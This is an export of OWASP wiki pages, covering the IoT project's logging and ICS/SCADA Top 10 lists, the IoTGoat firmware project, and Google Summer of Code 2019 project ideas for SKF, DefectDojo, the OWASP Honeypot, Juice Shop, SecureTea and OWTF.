* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<br />
<br />
= IoTGoat =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoT Goat will be a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project]] <br />
<br />
To get more information on getting started visit the project's Github: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=GSoC2019_Ideas&diff=249758GSoC2019 Ideas2019-04-05T20:21:49Z<p>Aaron.guzman: /* Idea 1: Insecure firmware web application ecosystem */</p>
<hr />
<div>=OWASP Project Requests=<br />
<br />
'''Tips to get you started in no particular order:''' <br />
'''* Read [https://developers.google.com/open-source/gsoc/ Google Summer of Code Program(GSOC)]`'''<br />
'''* Read the [[GSoC SAT]] '''<br />
* Read the [https://www.owasp.org/index.php/GSoC GSOC Student Guidelines]<br />
* Contact us through the mailing list or irc channel.<br />
* Check our [https://github.com/OWASP github organization]<br />
<br />
<br />
==OWASP-SKF==<br />
<br />
=== Idea 1 Improving the Machine Learning chatbot: ===<br />
We want to extend the functionality of SKF Bot. (Security Knowledge Framework Chatbot):<br />
<br />
Some improvements or the suggestions which we can do to improve the functionality are:<br />
<br />
1. Create a desktop version of the chatbot. Where people can install the setup file on their local machine.<br />
<br />
2. Create a Plugin or website bot which we can add in the website for better chat experience for the user.<br />
<br />
3. Extend the bots capability to do the google search (using web scraping) for the things which are not available in the database. So, it will have a wider scope of knowledge.<br />
<br />
4. Add basic conversation flow which makes SKF Bot friendly and provides the better user experience. Example: Replies to the general queries like How are you? What is your Name etc?<br />
<br />
5. Extend the bot capability to reply to what security controls should be followed from the ASVS and MASVS or other custom checklists that are present in SKF.<br />
# Extend the bot to different platforms like Facebook, telegram, slack, Google Assistant etc.<br />
Existing chatbot implementation is on Gitter. You can test the bot by typing @skfchatbot on Gitter Community.<br />
<br />
'''Getting started:'''<br />
<br />
· Get familiar with the architecture and code base of SKF (Security Knowledge Framework)<br />
<br />
· Get a feeling for the high code & test quality bar by inspecting the existing test suites and static code analysis results<br />
<br />
· Get familiar with the CI/CD process based on Travis-CI and several associated 3rd party services<br />
<br />
'''Knowledge Prerequisites:'''<br />
<br />
· Python 3+, Flask, Coffee Script<br />
<br />
'''Mentors and Leaders'''<br />
<br />
Glenn ten Cate (Mentor, Project leader)<br />
<br />
Riccardo ten Cate (Mentor, Project leader)<br />
<br />
Priyanka Jain (Mentor)<br />
<br />
=== Idea 2 Improving and building Lab challenges and write-ups: ===<br />
Build lab examples and write-ups (how to test) for different vulnerabilities over different technology stacks. These challenges are to be delivered in Docker so they can be <br />
<br />
easily deployed.<br />
<br />
In the current situation the security knowledge framework ultimately presents a list of security controls with correlating knowledge base items that contain a description and <br />
<br />
a solution. The new labs are used to give the software developers or application security specialists a more in depth understanding and approach on how to test the <br />
<br />
vulnerabilities in their own code. <br />
* For example we have now around 20 lab challenges in Docker container build in Python:<br />
** A Local File Inclusion Docker app example:<br />
*** https://github.com/blabla1337/skf-labs/tree/master/LFI<br />
** A write-up example:<br />
*** https://owasp-skf.gitbook.io/asvs-write-ups/filename-injection<br />
The images that are pushed to the Github repository are already automatically build and pushed to a docker registry where the SKF users can easily pull the images from to get their<br />
<br />
labs running. Of course they can download it and build it themselves from source by pulling the original repository. <br />
<br />
=== Idea 3 Addition of exploitation framework + labs + challenges and write ups ===<br />
The proposal for SKF (Security Knowledge Framework) involves addition of “Exploit Development Framework” , the idea revolves around how does one start with Linux exploit development from basic string format attacks to advance buffer overflows.<br />
<br />
The idea is to develop an addition (framework) which intergrates SKF, that now gives you an hands on experience for writing exploit code deployed over various containers with the help of dockers for easy and instant deployment.<br />
<br />
The framework will involve a browser based environmental (shell) and inbuilt chat utility that will be guiding you on how to go from an absolute beginner with gdb basics to all the way to how to bypass various protections like ASLR/NX/Canaries on Linux environment.<br />
<br />
Each challenge will have a dedicated container to easily maintain various challenges, also it will give you an option to connect to binary running on a particular port if you want to access it via your own machine, and also the source to the vulnerable code. This idea gives user a flexibility to experiment with the idea and even automate the attacks in python via socket programs or user intermediate framework like pwntools.<br />
<br />
The whole idea of challenges isn’t limited to stack based buffer overflows, but includes various challenges like format string attacks, double frees, heap overflows and privilege escalations.<br />
<br />
Total number will be deploying 20 challenges, the whole idea isn’t limited to exploit development but also to try out some very advance exploitation techniques like blind ROPs and lots of experimentation.<br />
<br />
The whole add on also comes with a dedicated document with very well written ways to exploit challenges in various flavours like manual, automated, advanced.<br />
<br />
Upon completion of labs and write ups the NLP model can be trained now to know not just web, but also all about various languages like C / C++ coding best practices and risk involved with calls like free (); puts(); and not just only tell the theory on why is it bad but also train you and guide you why it is bad and how you can write an exploit from a vulnerable code.<br />
<br />
Upon completion of labs with ASLR turned off on (non ASLR) stages they can be turned on and lead to ROP with ASLR and even more challenging questions.<br />
<br />
'''Mentors and Leaders''' <br />
<br />
Glenn ten Cate (Mentor, Project leader)<br />
<br />
Riccardo ten Cate (Mentor, Project leader)<br />
<br />
Priyanka Jain (Mentor, SKF Contributor)<br />
<br />
== OWASP DefectDojo ==<br />
OWASP DefectDojo is a popular open source vulnerability management tool and is used as the backbone for security programs. It is easy to get started with to work on! We welcome volunteers of all experience levels and are happy to provide mentorship.<br />
<br />
'''Issue Tracking:'''<br />
<br />
Enhancement [https://github.com/DefectDojo/django-DefectDojo/issues?q=is%3Aissue+is%3Aopen+label%3Aenhancement requests] and [https://github.com/DefectDojo/django-DefectDojo/issues?q=is%3Aissue+is%3Aopen+label%3Abug bugfixes] are located in Github issues. This project could implement a whole bunch of new features one by one and release them over the course of several small releases. <br />
<br />
'''Expected Results:'''<br />
* 5 or more new features or functional enhancements of significant scope for OWASP DefectDojo<br />
* Each feature comes with full functional unit and integration tests<br />
'''Getting started:'''<br />
* Get familiar with the architecture and code base of the application built on Django<br />
* Review the application functionality and familiarize yourself with Products, Engagements, Tests and Findings.<br />
* Get familiar with the CI/CD process based on Travis-CI<br />
'''Knowledge Prerequisites:'''<br />
* Python, Django, Javascript, Unit/Integration testing.<br />
'''Potential Mentors:'''<br />
* [[Mailto:aaron.weaver2+gsoc@gmail.com|Aaron Weaver]] - DefectDojo Project Leader<br />
* [[Mailto:greg.anderson@owasp.org|Greg Anderson]] - DefectDojo Project Leader<br />
* [[Mailto:matt.tesauro@owasp.org|Matt Tesauro]] - DefectDojo Project Leader<br />
'''Option 1: Unit Tests - Difficulty: Easy'''<br />
* If you're new to programming, unit tests are short scripts designed to test a specific function of an application.<br />
* The project needs additional unit tests to ensure that new code functions properly. <br />
* Review the current [https://github.com/DefectDojo/django-DefectDojo/tree/dev/dojo/unittests unit tests] <br />
* Complete Code Coverage Testing<br />
** Validate Tests exist for the following (create any that are missing):<br />
*** Finding, Test, Engagement, Reports, Endpoints <br />
*** Import from all scanners <br />
'''Option 2: Python3 Completion'''<br />
* DefectDojo is finishing up a migration to Python3<br />
Test the current [https://github.com/DefectDojo/django-DefectDojo/tree/python3/dojo/unittests state] of Python3<br />
* Ensure all features work<br />
* Travis testing works correctly<br />
'''Option 3: Scan 2.0 / Launch Containers'''<br />
<br />
Scan 2.0 consists of automating the scanning orchestration within DefectDojo. Several proof of concepts exist for this using the AppSecpPipeline to launch containers and then push those finding into the appropriate product. <br />
* Use the [https://github.com/appsecpipeline/AppSecPipeline-Specification AppSecPipeline] containers to build a scanning pipeline built on top of [https://www.openfaas.com/ OpenFaaS]<br />
* Scans should be able to be scheduled by DefectDojo and then invoked via the REST API call to OpenFaaS<br />
* Upon scan completion the results will be posted back to DefectDojo via DefectDojo's REST API and consumed as an engagement/test.<br />
* Pick 2 or 3 popular open source scanners such as NMAP, ZAP and Nikto to start out with.<br />
<br />
== OHP (OWASP Honeypot) ==<br />
<br />
[[OWASP_Python_Honeypot|OWASP Honeypot]] is an open source software in Python language which designed for creating honeypot and honeynet in an easy and secure way! This project is compatible with Python 2.x and 3.x and tested on Windows, Mac OS X and Linux.<br />
<br />
=== Getting Start ===<br />
<br />
It's best to start from [https://github.com/zdresearch/OWASP-Honeypot/wiki GitHub wiki page], we are looking forward to adding more modules and optimize the core.<br />
<br />
=== Technologies ===<br />
<br />
Currently we are using<br />
<br />
* Docker<br />
* Python<br />
* MongoDB<br />
* TShark<br />
* Flask<br />
* ChartJS<br />
* And more linux services<br />
<br />
=== Expected Results ===<br />
<br />
* Zero Bugs: Currently we may have several bugs in different conditions, and it's best to test the all functions and fix them<br />
* Monitoring: Right now monitoring limited to the connections (send&recieve) and it's best to store and analysis the contents for farther investigations and recognizing incoming attacks.<br />
* Duplicated codes: codes are complicated and duplicated in engine, should be fixed/clean up<br />
* New modules: add some creative ICS/Network/Web modules andvulnerable web applications, services and stuff<br />
* API: update API sync to all features<br />
* WebUI: Demonstrate and add API on WebUI and Live version with all features<br />
* WebUI Special Reports: Track the attacks more creative and provide high risk IPs<br />
* Database: Better database structure, faster and use queue<br />
* Data analysis: Analysis stored data and attack signatures<br />
* OWASP Top 10: Preparing useful processed/raw data for OWASP top 10 project<br />
<br />
=== Students Requirements ===<br />
<br />
* Python<br />
* Packet Analysis & Tshark & Libpcap<br />
* Docker<br />
* Database<br />
* Web Development Skills<br />
* Honeypot and Deception knowledge<br />
<br />
=== Mentors and Leaders ===<br />
<br />
* [mailto:ali.razmjoo@owasp.org Ali Razmjoo] (Mentor & Project Leader)<br />
* [mailto:ehsan@nezami.me Ehsan Nezami] (Mentor & Project Leader)<br />
* [mailto:reza.espargham@owasp.org Reza Espargham](Mentor)<br />
* [mailto:abiusx@owasp.org Abbas Naderi] (Mentor)<br />
<br />
== OWASP Juice Shop ==<br />
<br />
[[OWASP Juice Shop Project]] is an intentionally insecure webapp for security trainings written entirely in Javascript which encompasses the entire OWASP Top Ten and other severe security flaws. Juice Shop is written in Node.js, Express and Angular. The application contains more than 30 challenges of varying difficulty where the user is supposed to exploit the underlying vulnerabilities. Apart from the hacker and awareness training use case, pentesting proxies or security scanners can use Juice Shop as a "guinea pig"-application to check how well their tools cope with Javascript-heavy application frontends and REST APIs.<br />
The best way to get in touch with us is the '''community chat on https://gitter.im/bkimminich/juice-shop<nowiki/>.''' You can also send PMs to the potential mentors (@bkimminich, @J12934 and @CaptainFreak) there if you like!<br />
<br />
To receive early feedback please '''put your proposal on Google Docs and submit it to the OWASP Organization on Google's GSoC page''' in ''Draft Shared'' mode. Please pick '''''juice shop'' as Proposal Tag''' to make them easier to find for us. '''Thank you!'''<br />
<br />
=== Feature Pack 2019 ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
Ideas for potential new functionality and "business" features are collected in [https://github.com/bkimminich/juice-shop/issues?q=is%3Aissue+is%3Aopen+label%3Afeature GitHub issues labeled "feature"]. This project could implement a whole bunch of new features one by one and release them over the course of several small releases. This would allow the student to work in a professional Continuous Delivery kind of way while bringing benefit to the Juice Shop over the duration of the project.<br />
<br />
''Coming up with good additional ideas for features and new functionality in the proposal could make the difference between being selected or declined as a student for this project!''<br />
<br />
'''Expected Results:'''<br />
* 5 or more new features or functional enhancements of significant scope for OWASP Juice Shop (not necessarily including corresponding challenges)<br />
* Each feature comes with full functional unit and integration tests<br />
* Extending the functional walk-through chapter of the "Pwning OWASP Juice Shop" ebook<br />
* Code follows existing styleguides and passes all existing quality gates regarding code smells, test coverage etc.<br />
<br />
''' Getting started: '''<br />
* Get familiar with the architecture and code base of the application's rich Javascript frontend and RESTful backend<br />
* Get a feeling for the high code & test quality bar by inspecting the existing test suites and static code analysis results<br />
* Get familiar with the CI/CD process based on Travis-CI and several associated 3rd party services<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) Angular and NodeJS/Express, security knowledge is optional.<br />
<br />
'''Potential Mentors:'''<br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
* Jannik Hollenbach - OWASP Juice Shop Project Collaborator<br />
* Shoeb Patel - OWASP Juice Shop Contributor (and former GSoC 2018 Student)<br />
<br />
=== Juice Shop Mobile ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
A complete mobile client for Juice-Shop API which will serve a legit mobile experience for Juice-Shop user as well as a plethora of Mobile app vulnerabilities and challenges around them to solve. Should in the best case translate the idea of Juice Shop's hacking challenges with a score board and success notifications into the mobile world.<br />
<br />
''Coming up with a sophisticated proposal (optimally even with a good initial sample implementation) could make the difference between being selected or declined as a student for this project!''<br />
<br />
''' Getting started '''<br />
* Get familiar with the architecture and code base of the application's RESTful backend<br />
* Get familiar with Native App developement<br />
* Get familiar with Mobile vulnerabilities<br />
<br />
'''Expected Results:'''<br />
* A mobile App with consistent UI/UX for Juice-Shop with standard client side vulnerabilities.<br />
* Sufficient initial release quality (en par with Juice Shop and Juice Shop CTF) to make it an official extension project hosted in its own GitHub repository ''bkimminich/juice-shop-mobile''<br />
* Code follows existing styleguides and applies similar quality gates regarding code smells, test coverage etc. as the main project.<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) React Native and NodeJS/Express, some Mobile security knowledge would be preferable.<br />
<br />
'''Potential Mentors:'''<br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
* Jannik Hollenbach - OWASP Juice Shop Project Collaborator<br />
* Shoeb Patel - OWASP Juice Shop Contributor (and former GSoC 2018 Student)<br />
<br />
=== Challenge Pack 2019 ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
Ideas for potential new hacking challenges are collected in [https://github.com/bkimminich/juice-shop/issues?q=is%3Aissue+is%3Aopen+label%3Achallenge GitHub issues labeled "challenge"]. This project could implement a whole bunch of challenges one by one and release them over the course of several small releases. This would allow the student to work in a professional Continuous Delivery kind of way while bringing benefit to the Juice Shop over the duration of the project.<br />
<br />
''Coming up with good additional ideas for challenges in the proposal could make the difference between being selected or declined as a student for this project!''<br />
<br />
'''Expected Results:'''<br />
* 10 or more new challenges for OWASP Juice Shop (including required functional enhancements to place the challenges)<br />
* Each challenge comes with full functional unit and integration tests<br />
* Each challenge is verified to be exploitable by corresponding end-to-end tests<br />
* Hint and solution sections for each new challenge are added to the "Pwning OWASP Juice Shop" ebook<br />
* Code follows existing styleguides and passes all existing quality gates regarding code smells, test coverage etc.<br />
<br />
''' Getting started: '''<br />
* Get familiar with the architecture and code base of the application's rich Javascript frontend and RESTful backend<br />
* Get a feeling for the high code & test quality bar by inspecting the existing test suites and static code analysis results<br />
* Get familiar with the CI/CD process based on Travis-CI and several associated 3rd party services<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) Angular and NodeJS/Express, some security knowledge would be preferable.<br />
<br />
'''Potential Mentors:'''<br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
* Jannik Hollenbach - OWASP Juice Shop Project Collaborator<br />
* Shoeb Patel - OWASP Juice Shop Contributor (and former GSoC 2018 Student)<br />
<br />
=== Your idea ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
You have an awesome idea to improve OWASP Juice Shop that is not on this list? Great, please submit it!<br />
<br />
''' Getting started '''<br />
* Get in touch with [https://www.owasp.org/index.php/User:Bjoern_Kimminich Bjoern Kimminich]<br />
<br />
'''Expected Results:'''<br />
* A new feature that makes OWASP Juice Shop even better<br />
* Code follows existing styleguides and passes all existing quality gates regarding code smells, test coverage etc.<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) Angular and NodeJS/Express, some security knowledge would be preferable.<br />
<br />
'''Mentors:''' <br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
<br />
==OWASP-Securetea Tools Project ==<br />
The OWASP SecureTea Project is an application designed to help secure a person's laptop or computer / server with IoT (Internet Of Things) and notify users (via various communication mechanisms), whenever someone accesses their computer / server. This application uses the touchpad/mouse/wireless mouse to determine activity and is developed in Python and tested on various machines (Linux, Mac & Windows).<br />
The software is still under development, and will eventually have it's own IDS(Intrusion Detection System) / IPS(Instrusion Prevention System), firewall, anti-virus, intelligent log monitoring capabilities with web defacement detection, and support for much more communication medium.<br />
. -<br />
https://github.com/OWASP/SecureTea-Project/blob/master/README.md<br />
<br />
===Brief Explanation===<br />
We are looking any awesome idea to improve Securetea Project that is not on this list? We are expecting make this project will be useful to everyone to secure their Small IoT. <br />
<br />
===Idea===<br />
Below roadmap and expect results you can choose to improve Securetea Project . <br />
if any bugs please help to fix it<br />
<br />
===Roadmap=== <br />
See Our Roadmap<br><br />
https://github.com/OWASP/SecureTea-Project#roadmap<br><br />
<br />
===Expect Results ===<br />
<br><br />
Securetea Protection /firewall<br><br />
Securetea Antivirus<br><br />
Notify by Whatsapp<br><br />
Notify by SMS Alerts<br><br />
Notify by Line<br><br />
Notify by Telegram<br><br />
Intelligent Log Monitoring include Web Deface Detection<br><br />
Detection of malicious devices <br><br />
Login History<br><br />
=== Students Requirements ===<br />
<br />
* Python<br />
* Javascript <br />
* Angular and NodeJS/Express<br />
* Database<br />
* Linux<br />
<br />
=== Mentors === <br />
<br />
* [mailto:ade.putra@owasp.org Ade Yoseman Putra] - (OWASP Securetea Project Leader) <br><br />
* [mailto:rejah.rehim@owasp.org Rejah Rehim.A.A]]- (OWASP Securetea Project Leader)<br />
<br><br />
<br />
==OWASP OWTF==<br />
'''[https://github.com/owtf/owtf Offensive Web Testing Framework (OWTF)]''' is a project focused on penetration testing efficiency and alignment of security tests to security standards like the OWASP Testing Guide (v3 and v4), the OWASP Top 10, PTES and NIST. Most of the ideas below focus on rewrite of some major components of OWTF to make it more modular. OWTF is moving to a fresh codebase with a fully Docker testing and deployment environment. If you want to get a jumpstart, check out https://github.com/owtf/owtf/tree/new-arch.<br />
<br />
=== OWASP OWTF - Passive Online scanner improvements ===<br />
'''Brief Explanation'''<br />
<br />
OWTF allows many passive tests, such as those using third party websites like Google, Bing, etc. searches, as well as handy "Search for vulnerability" search boxes (i.e. Fingerprinting plugin). This feature involves the creation of a '''script''' that produces an interactive OWTF report with the intention of hosting it in the github.io site. The idea here is to have a passive, JavaScript-only interactive report available on the owtf.github.io site, so that people can try OWTF '''without installing anything''', simply visiting a URL.<br />
<br />
This would be a normal OWTF interactive report where the user can:<br />
* Enter a target<br />
* Try passive plugins (only the parts that use no tools)<br />
* Play with boilerplate templates from the OWTF interactive report<br />
An old version of the passive online scanner is hosted at https://owtf.github.io/online-passive-scanner.<br />
<br />
'''LEGAL CLARIFICATION (Just in case!)''': The passive online scanner, simply makes OWTF passive testing '''through third party websites''' more accessible to anybody, however it is the user that must 1) click the link manually + 2) do something bad with that afterwards + 3) doing 1 + 2 WITHOUT permission :). Therefore this passive online scanner does not do anything illegal [http://www.slideshare.net/abrahamaranguren/legal-and-efficient-web-app-testing-without-permission More information about why this is not illegal here] (recommended reading!)<br />
<br />
For background on OWASP OWTF please see: https://www.owasp.org/index.php/OWASP_OWTF<br />
<br />
'''Expected results:'''<br />
* '''IMPORTANT: [http://legacy.python.org/dev/peps/pep-0008/ PEP-8 compliant code]/ES6 JavaScript code in all modified code and surrounding areas.'''<br />
* High performance<br />
* Reliability<br />
* Ease of use<br />
* Test cases<br />
* Good documentation<br />
<br />
'''Knowledge Prerequisite:'''<br />
<br />
A good knowledge of JavaScript and writing ES6 compliant React/TypeScript is needed. Previous exposure to security concepts and penetration testing is not required but recommended and some lack of this can be compensated with pre-GSoC involvement and will to learn.<br />
<br />
'''OWASP OWTF Mentors:''' Contact: [mailto:Abraham.Aranguren@owasp.org Abraham Aranguren][mailto:viyat.bhalodia@owasp.org Viyat Bhalodia]<br />
<br />
===OWASP OWTF - MiTM proxy interception and replay capabilities===<br />
'''Brief Explanation:'''<br />
<br />
The OWTF man-in-the-middle proxy is written completely in Python (based on the excellent Tornado framework) and was benchmarked to be the fastest MiTM python proxy. However it lacks the useful and much need interception and replay capabilities of mitmproxy (https://github.com/mitmproxy/mitmproxy).<br />
<br />
The current implementation of the MiTM proxy serves its purpose very well. Its fast but its not extensible. There are a number of good use cases for being extensible<br />
*ability to intercept the transactions<br />
*modify or replay transaction on the fly<br />
*add additional capabilities to the proxy (such as session marking/changing) without polluting the main proxy code<br />
Bonus:<br />
*Design and implement a proxy plugin (middleware) architecture so that the plugins can be defined separately and the user can choose what plugins to include dynamically (from the web interface).<br />
*Replace the current Requester (based on urllib, urllib2) with a more robust Requester based on the new urllib3 with support for a real headless browser factory. The typical flow when requested for an authenticated browser instance (using PhantomJS)<br />
<br />
